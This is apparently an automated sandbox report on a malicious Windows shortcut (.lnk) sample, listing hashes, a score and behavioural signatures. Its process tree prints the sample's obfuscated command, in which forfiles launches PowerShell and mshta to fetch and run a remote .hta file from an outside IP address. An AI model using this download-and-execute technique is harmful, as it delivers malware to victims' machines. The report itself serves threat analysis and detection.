Analysis
-
max time kernel
122s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
08/01/2024, 11:04
Static task
static1
Behavioral task
behavioral1
Sample
2c4ed97859060ea6ac5a8c2f605debf98257a96f0f3d2ddfaeb066f59a86d4af.lnk
Resource
win7-20231215-en
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
2c4ed97859060ea6ac5a8c2f605debf98257a96f0f3d2ddfaeb066f59a86d4af.lnk
Resource
win10v2004-20231215-en
6 signatures
150 seconds
General
-
Target
2c4ed97859060ea6ac5a8c2f605debf98257a96f0f3d2ddfaeb066f59a86d4af.lnk
-
Size
1KB
-
MD5
30a2a6ffdbf23be8dd7e6dd2942b55bc
-
SHA1
47de2265afdf23794e81d8c5b26881377f83f653
-
SHA256
2c4ed97859060ea6ac5a8c2f605debf98257a96f0f3d2ddfaeb066f59a86d4af
-
SHA512
0209166f43f54abf07e064aaccb525b2a50d6f96b8ad1d69412f8e36b17d51cc0fbdc018f4afd8b1c2430aa3d32117ef9da3d8404f3524807364e8f8d025889b
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2768 wrote to memory of 2808 2768 cmd.exe 24 PID 2768 wrote to memory of 2808 2768 cmd.exe 24 PID 2768 wrote to memory of 2808 2768 cmd.exe 24
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\2c4ed97859060ea6ac5a8c2f605debf98257a96f0f3d2ddfaeb066f59a86d4af.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p \Windows\SKB /c "powershell . \*i*\S*3*\m*ta.e* http://199.34.27.196/139.99.23.XX/139.99.23.XX-Tru.hta2⤵PID:2808
-